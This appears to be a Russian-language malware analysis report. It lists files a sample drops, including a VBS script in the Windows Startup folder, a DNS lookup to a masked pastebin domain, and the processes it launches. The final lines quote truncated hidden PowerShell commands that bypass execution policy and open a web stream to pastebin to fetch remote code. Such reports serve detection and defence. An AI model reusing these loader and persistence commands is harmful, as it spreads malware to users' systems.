Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\u.vbs
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- %ProgramFiles(x86)%\i.exe
- %TEMP%\3@.vbs
- %ProgramFiles(x86)%\company\newproduct\uninstall.exe
- %ProgramFiles(x86)%\company\newproduct\uninstall.ini
- %TEMP%\nslecaa.tmp\system.dll
- %TEMP%\nslecaa.tmp\modern-wizard.bmp
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\$inst\2.tmp
- DNS ASK pa###bin.com
- ClassName: '#32770' WindowName: ''
- '%ProgramFiles(x86)%\i.exe'
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\3@.vbs"
- '%WINDIR%\syswow64\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('ht...' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('ht...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://pastebin...